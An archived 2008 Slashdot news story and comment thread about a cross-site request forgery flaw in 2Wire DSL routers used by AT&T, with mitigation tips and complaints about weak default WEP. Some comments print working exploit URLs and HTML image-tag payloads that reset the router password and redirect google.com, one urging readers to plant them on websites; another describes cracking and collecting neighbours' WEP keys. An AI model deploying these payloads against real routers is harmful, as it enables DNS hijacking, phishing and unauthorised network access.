Stories
Slash Boxes
Comments
Search

News for nerds, stuff that matters

Slashdot Log In

Log In

Create Account  |  Retrieve Password

AT&T, 2Wire Ignoring Active Security Exploit [Updated]

Posted by kdawson on Tue Apr 08, 2008 03:51 PM
from the complicit-in-the-attacks dept.
Security Technology
An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit." Update: 04/09 17:48 GMT by KD : AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."
+ -
story

Related Stories

Submission: 2Wire and AT&T ignore active security exploit by Anonymous Coward
This discussion has been archived. No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

AT&T, 2Wire Ignoring Active Security Exploit [Updated] 50 Comments More /

 Full
 Abbreviated
 Hidden
More
Loading... please wait.
  • ... I still have my old Speedstream 5100b. :)
    • my Hayes 300 laughs at you.

    • Re: (Score:3, Interesting)

      by value_added (719364)
      I still have my old Speedstream 5100b. :)

      I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works likes it's supposed to.

      On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.

      I know this isn't Ask Slashdot, but does anyone know
      • There was no joke intended, just a bit of gloating that I have a modem that still works perfectly and is secure (as far as I know).

      • Re: (Score:3, Interesting)

        by houstonbofh (602064)
        I got a brand new speedstream 4100 with my AT&T DSL connection 8 months ago. I just had to say at least 6 times, "Yes I really do want just a modem. No I do not want a 2wire. Yes I know what I am saying. Yes I know it is free with the rebate. No I still don't want it." I also had to lie and say I was using Windows just to get my DLS turned on. I guess it like for me to talk dirty...
    • I use a Speedstream 5100 too but no bloody a b or c.
  • anyone know if this affects the 2wire 2700 gateways?

  • Anybody have any ideas... (Score:3, Funny)

    by Thelasko (1196535) on Tuesday April 08 2008, @04:00PM (#23005306) Journal
    on how to walk my mom through changing her IP scheme and modify the hosts file? Do I have to go over there?

  • Funny Post (Score:3, Funny)

    by Anonymous Coward on Tuesday April 08 2008, @04:01PM (#23005322)
    Me Chinese
    Exploit SOCKS,
    Me put malware
    On your box!

  • What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?

    I smell lawsuits. Many, many lawsuits.

    • Re: (Score:3, Insightful)

      by eonlabs (921625)
      Easy, if they think it's no skin off their back for not updating their hardware, they think they can save money by not doing it. If they have 10,000 customers and it's $100 to replace one of their old modems, then it's a million bucks to swap them all out. If they don't think there's a risk of being held responsible for more than that for not changing their hardware, where is the incentive.

      Hell, the security flaws typically affect the customer. Will that stop most people's internet addictions?

      Here's anot

  • Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)

    by Anonymous Coward on Tuesday April 08 2008, @04:15PM (#23005488)
    I tried their example for adding example.com to DNS (here as not a live link; copy it paste it yourself at your own risk):

    http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
    and all it did was leave me at the "enter system password" page. Yes, my router has a non-default system password. The system software release is 4.25.19.

    • Re:Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)

      by skis (920891) on Tuesday April 08 2008, @04:53PM (#23005912)
      This exploit is CSRF (Cross-site request forgery). This means that you have to have an active authenticated session to your router in your browser. When you click the link and your browser is already authenticated, it will send your session cookie along with the HTTP request, and the web server in your router will know you are already authenticated, and execute the command you gave it.

      Try logging in to your router, open a new tab, and click on that link again and see if it works.

      • Re: (Score:3, Interesting)

        by Clueless Moron (548336)

        I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.

        But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.

        TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only

        • Re: (Score:3, Informative)

          by Clueless Moron (548336)

          (replying to myself...)

          apparently it works only if you happen to have logged into an admin page on the router within the past few minutes, which is remarkably unlikely.

          Ok, I see the problem now: although just about every setup page imaginable on the router uses a session cookie to make sure you have logged in, the "set initial router password" page does not, and does not care if an initial password has already been set (stupid!).

          So the 'sploit is to first invoke the "set initial router password"

    • Thanks so much for that URL.

      If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

      <img src="http://192.168.1.254/xslt?PAGE=H04_POST&amp;PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
      <img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
      <img src="

  • ... wont be much surprised if most of the Kraken [slashdot.org] botnet (or other so widespread malware) are mostly behind 2Wire routers.

  • I'm not suprised, given my experience with 2wire (Score:4, Interesting)

    by krovisser (1056294) * on Tuesday April 08 2008, @04:29PM (#23005640)

    One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget it's own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.

    I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.

    • I have to deal with a 2700 for one of remote locations (or have to deal with it until next month, when we get a useful router/modem). What a piece of shit. The software is so bunged up that I can't even get rid of customized open app ports. What a horrendous piece of shit. Who designs these things? They should be taken out and have their brains removed, though it's likely they wouldn't notice, with firmware as faulty as that which they put in their routers.
    • i've worked with these things (their 2700 gateways). they're great modems (though really really sensitive to surges), but these guys do not know how to design the router side. go above a couple hundred connections, and it crashes it (hitting "refresh all" in the CS server browser will do this almost every time). try to transfer files between wired and wireless (or vise versa) and it slows to a crawl. best idea is put the damn thing in bridge mode and get a real router.

  • Bridge Mode (Score:5, Insightful)

    by John Hasler (414242) on Tuesday April 08 2008, @04:31PM (#23005670)
    Never trust these combination modem/router/firewalls. Put the thing in bridge mode and run a real router behind it (such as an old pc running Debian or OpenBSD or even an old Cisco).
    • Difficult when you CANNOT due to limitations of your provider. Anyone who has AT&T's U-verse product *must* run the 2WIRE box in router mode. There is no other choice.
  • I can detect 4 of these routers from inside my house, all using the SSID 2WIRE. There must be tens of thousands of these things out there, the vast majority running the default, unsecured configuration...

    • Re: (Score:2, Insightful)

      by cicatrix1 (123440)
      By default they come with 32 bit WEP, I think. It's technically not "unsecured", but the difference is basically negligible :p

      • Re:Large install base (Score:5, Informative)

        by Erpo (237853) on Wednesday April 09 2008, @12:05AM (#23009260)
        By default they come with 32 bit WEP

        You're closer to the truth than you know. They use 64 bit (i.e. 8 byte) WEP by default, which is really 40 bit (i.e. 5 byte) WEP since three of those bytes are the IV and broadcast in the clear. However, 2WIRE has an awful policy of printing the WEP key on the side of the modem in hex format and not using the digits A through F.

        So the default key, written in hex, is a "decimal" number somewhere between 0,000,000,000 and 9,999,999,999. That's only 10 billion possibilities, or about 33.2 bits of entropy. Your computer can crack through that in a day or two with only three or four captured packets.

        When I discovered this (and, of course, got stonewalled by 2WIRE), I wrote a patch for aircrack (now aircrack-ng) that programs it to search only the binary coded decimal keyspace. I named this option -t in honor of "Two Wire" for their terrible security.
    • must be a local thing, as all the 2wire's sasktel uses (the 2700 gateways) come defaulted with WEP. used to be WPA, but too many people complained about it not working with stupid hardware (usually nintendo DS) not working with it.

  • from the DSL reports forums (Score:5, Informative)

    by Some_Llama (763766) on Tuesday April 08 2008, @04:42PM (#23005790) Homepage Journal
    You can implement a temporary fix yourself. The first post in the following thread describes how to protect yourself until 2wire fixes the issue 2Wire Cross Site Request Forgery Vulnerability .

    Here is a short summary:

    First, change the IP scheme that the 2wire is using for your home network. Specifically, change the IP address of the 2wire router itself. This will prevent attacks against 192.168.1.254.

    Next you have to prevent attacks against the domains "home" and "gateway.2wire.net". You can do this a couple of ways. You can modify your hosts file and point those domains to 127.0.0.1... or you can hardcode the dns settings into your computer so that your computer is not using the 2wire to resolve domain names.

    Of course the bottom line is 2wire needs to plug this hole. When will that happen? Who knows.
    • Suppose one has never trusted the equipment that came from the telco, and have never connected anything but a single firewall/router to the telco DSL box. Does the vulnerability still matter? I assume that the telco is giving us the cheapest crap it can, and should not be trusted beyond the limits of liability to the telco.

  • 2Wire routers also very weak on WEP (Score:5, Interesting)

    by Jeffrey Baker (6191) on Tuesday April 08 2008, @05:04PM (#23006032)
    2Wire access points also come hard-coded for 56-bit WEP, which can be cracked in seconds. I have a list of hundreds of WEP keys I got just from riding my bicycle around San Francisco with a laptop chugging away in my backpack. These are by far the worst access points ever deployed, and they are, sadly, also the most widely deployed in the USA.
  • There won't be any repercussions for them. the customer will get screwed, why would they care?
  • These devices also suffer from another exploit -- the one where technicians come in and leave the WiFi completely open and not tell the customer or, worse, tell them they're "protected" because it's "firewalled."

    I've seen this with my own eyes dozens of times. :-(

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2009 Geeknet, Inc.